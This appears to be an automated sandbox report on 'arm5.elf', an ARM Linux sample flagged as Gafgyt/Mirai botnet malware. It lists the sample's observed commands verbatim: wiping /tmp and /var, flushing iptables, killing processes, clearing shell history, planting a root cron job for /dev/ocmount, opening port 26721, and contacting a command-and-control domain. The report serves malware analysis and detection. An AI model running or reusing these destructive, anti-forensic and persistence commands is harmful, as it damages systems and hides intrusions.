Source: /bin/sh (PID: 6597) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Sample tries to persist itself using cron
Source: /bin/sh (PID: 6332) File: /etc/cron.d/mount.sh Jump to behavior
Tries to stop the "iptables" service
Source: /usr/sbin/service (PID: 6263) Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/sbin/service (PID: 6263) Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.service Jump to behavior
Creates hidden files and/or directories
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/php/.. Jump to behavior
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/gdm3/.cache Jump to behavior
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/gdm3/.cache Jump to behavior
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/gdm3/.config Jump to behavior
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/gdm3/.config Jump to behavior
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/gdm3/.local Jump to behavior
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/gdm3/.local Jump to behavior
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/snapd/assertions/asserts-v0/.. Jump to behavior
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/snapd/assertions/.. Jump to behavior
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/snapd/.. Jump to behavior
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/colord/.cache Jump to behavior
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants Jump to behavior
Source: /usr/bin/rm (PID: 6221) Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants Jump to behavior
Enumerates processes within the "proc" file system
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1582/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1582/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/3088/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/3088/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/230/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/230/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/110/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/110/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/231/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/231/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/111/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/111/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/232/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/232/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1579/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1579/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/112/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/112/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/233/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/233/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1699/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1699/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/113/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/113/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/234/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/234/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1335/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1335/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1698/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1698/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/114/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/114/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/235/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/235/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1334/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1334/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1576/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1576/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/2302/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/2302/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/115/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/115/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/236/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/236/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/116/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/116/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/237/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/237/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/117/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/117/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/118/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/118/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/910/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/910/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/119/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/119/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/912/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/912/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/10/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/10/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/2307/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/2307/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/11/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/11/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/918/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/918/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/6241/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/6241/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/12/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/12/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/13/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/13/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/14/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/14/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/15/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/15/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/16/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/16/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/17/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/17/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/18/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/18/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1594/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1594/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/120/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/120/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/121/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/121/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1349/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1349/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/1/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/122/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/122/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/243/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/243/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/123/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/123/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/2/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/2/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/124/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/124/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/3/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/3/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/4/status Jump to behavior
Source: /usr/bin/pkill (PID: 6254) File opened: /proc/4/cmdline Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/arm5.elf (PID: 6219) Shell command executed: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp" Jump to behavior
Source: /tmp/arm5.elf (PID: 6227) Shell command executed: sh -c "rm -rf /tmp/*" Jump to behavior
Source: /tmp/arm5.elf (PID: 6234) Shell command executed: sh -c "iptables -F" Jump to behavior
Source: /tmp/arm5.elf (PID: 6243) Shell command executed: sh -c "pkill -9 busybox" Jump to behavior
Source: /tmp/arm5.elf (PID: 6252) Shell command executed: sh -c "pkill -9 perl" Jump to behavior
Source: /tmp/arm5.elf (PID: 6256) Shell command executed: sh -c "pkill -9 python" Jump to behavior
Source: /tmp/arm5.elf (PID: 6261) Shell command executed: sh -c "service iptables stop" Jump to behavior
Source: /tmp/arm5.elf (PID: 6270) Shell command executed: sh -c "/sbin/iptables -F; /sbin/iptables -X" Jump to behavior
Source: /tmp/arm5.elf (PID: 6274) Shell command executed: sh -c "service firewall stop" Jump to behavior
Source: /tmp/arm5.elf (PID: 6286) Shell command executed: sh -c "history -c" Jump to behavior
Source: /tmp/arm5.elf (PID: 6288) Shell command executed: sh -c "rm -rf ~/.bash_history" Jump to behavior
Source: /tmp/arm5.elf (PID: 6291) Shell command executed: sh -c "history -w" Jump to behavior
Source: /tmp/arm5.elf (PID: 6302) Shell command executed: sh -c "chmod +x /dev/ocmount" Jump to behavior
Source: /tmp/arm5.elf (PID: 6332) Shell command executed: sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh" Jump to behavior
Source: /tmp/arm5.elf (PID: 6380) Shell command executed: sh -c /dev/ocmount Jump to behavior
Source: /tmp/arm5.elf (PID: 6601) Shell command executed: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm5.elf (PID: 6635) Shell command executed: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm5.elf (PID: 6638) Shell command executed: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm5.elf (PID: 6641) Shell command executed: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm5.elf (PID: 6644) Shell command executed: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm5.elf (PID: 6584) Shell command executed: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm5.elf (PID: 6621) Shell command executed: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm5.elf (PID: 6625) Shell command executed: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm5.elf (PID: 6628) Shell command executed: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm5.elf (PID: 6631) Shell command executed: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Executes the "chmod" command used to modify permissions
Source: /bin/sh (PID: 6327) Chmod executable: /usr/bin/chmod -> chmod +x /dev/ocmount Jump to behavior
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 6239) Iptables executable: /usr/sbin/iptables -> iptables -F Jump to behavior
Source: /bin/sh (PID: 6272) Iptables executable: /sbin/iptables -> /sbin/iptables -F Jump to behavior
Source: /bin/sh (PID: 6273) Iptables executable: /sbin/iptables -> /sbin/iptables -X Jump to behavior
Source: /bin/sh (PID: 6623) Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6597) Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Executes the "kill" or "pkill" command typically used to terminate processes
Source: /bin/sh (PID: 6248) Pkill executable: /usr/bin/pkill -> pkill -9 busybox Jump to behavior
Source: /bin/sh (PID: 6254) Pkill executable: /usr/bin/pkill -> pkill -9 perl Jump to behavior
Source: /bin/sh (PID: 6258) Pkill executable: /usr/bin/pkill -> pkill -9 python Jump to behavior
Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 6221) Rm executable: /usr/bin/rm -> rm -rf /tmp/arm5.elf /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-OmYV2g /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-McPs7g /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf /var/log/wtmp Jump to behavior
Source: /bin/sh (PID: 6233) Rm executable: /usr/bin/rm -> rm -rf /tmp/* Jump to behavior
Source: /bin/sh (PID: 6290) Rm executable: /usr/bin/rm -> rm -rf /root/.bash_history Jump to behavior
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /usr/sbin/service (PID: 6263) Systemctl executable: /usr/bin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/sbin/service (PID: 6266) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target Jump to behavior
Source: /usr/sbin/service (PID: 6268) Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket Jump to behavior
Source: /usr/sbin/service (PID: 6276) Systemctl executable: /usr/bin/systemctl -> systemctl stop firewall.service Jump to behavior
Source: /usr/sbin/service (PID: 6279) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target Jump to behavior
Source: /usr/sbin/service (PID: 6281) Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket Jump to behavior
Sample tries to set the executable flag
Source: /usr/bin/chmod (PID: 6327) File: /dev/ocmount (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Source: /bin/sh (PID: 6332) Crontab like entry written: /etc/cron.d/mount.sh Jump to dropped file
Writes shell script file to disk with an unusual file extension
Source: /tmp/arm5.elf (PID: 6299) Writes shell script file to disk with an unusual file extension: /dev/ocmount Jump to dropped file
Source: /usr/sbin/service (PID: 6269) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p Jump to behavior
Source: /usr/sbin/service (PID: 6282) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p Jump to behavior
Source: submitted sample Stderr: Failed to stop iptables.service: Unit iptables.service not loaded.Failed to stop firewall.service: Unit firewall.service not loaded.sh: 1: history: not foundsh: 1: history: not found: exit code = 0

Hooking and other Techniques for Hiding and Protection
barindex
Sample deletes itself
Source: /usr/bin/rm (PID: 6221) File: /tmp/arm5.elf Jump to behavior
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pkill (PID: 6248) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6254) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6258) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/arm5.elf (PID: 6217) Queries kernel information via 'uname': Jump to behavior
Source: /bin/busybox (PID: 6637) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/busybox (PID: 6646) Queries kernel information via 'uname': Jump to behavior
Source: /bin/busybox (PID: 6624) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/busybox (PID: 6634) Queries kernel information via 'uname': Jump to behavior
Source: arm5.elf, 6217.1.00007ffd6a394000.00007ffd6a3b5000.rw-.sdmp, arm5.elf, 6598.1.00007ffd6a394000.00007ffd6a3b5000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.elf
Source: arm5.elf, 6217.1.000055b924543000.000055b924699000.rw-.sdmp, arm5.elf, 6598.1.000055b924543000.000055b924699000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: arm5.elf, 6217.1.000055b924543000.000055b924699000.rw-.sdmp, arm5.elf, 6598.1.000055b924543000.000055b924699000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: arm5.elf, 6217.1.00007ffd6a394000.00007ffd6a3b5000.rw-.sdmp, arm5.elf, 6598.1.00007ffd6a394000.00007ffd6a3b5000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information
barindex
Yara detected Gafgyt
Source: Yara match File source: arm5.elf, type: SAMPLE
Source: Yara match File source: 6217.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6598.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
Yara detected Mirai
Source: Yara match File source: arm5.elf, type: SAMPLE
Source: Yara match File source: 6217.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6598.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Gafgyt
Source: Yara match File source: arm5.elf, type: SAMPLE
Source: Yara match File source: 6217.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6598.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
Yara detected Mirai
Source: Yara match File source: arm5.elf, type: SAMPLE
Source: Yara match File source: 6217.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6598.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
109.202.202.202
 unknown Switzerland
13030 INIT7CH false
212.118.43.167
 unknown Russian Federation
25308 CITYLAN-ASRU false
156.238.224.214
 octopus1337.geek Seychelles
394281 XHOSTSERVERUS false
91.189.91.43
 unknown United Kingdom
41231 CANONICAL-ASGB false
91.189.91.42
 unknown United Kingdom
41231 CANONICAL-ASGB false

Contacted Domains

Name IP Active
octopus1337.geek 156.238.224.214 true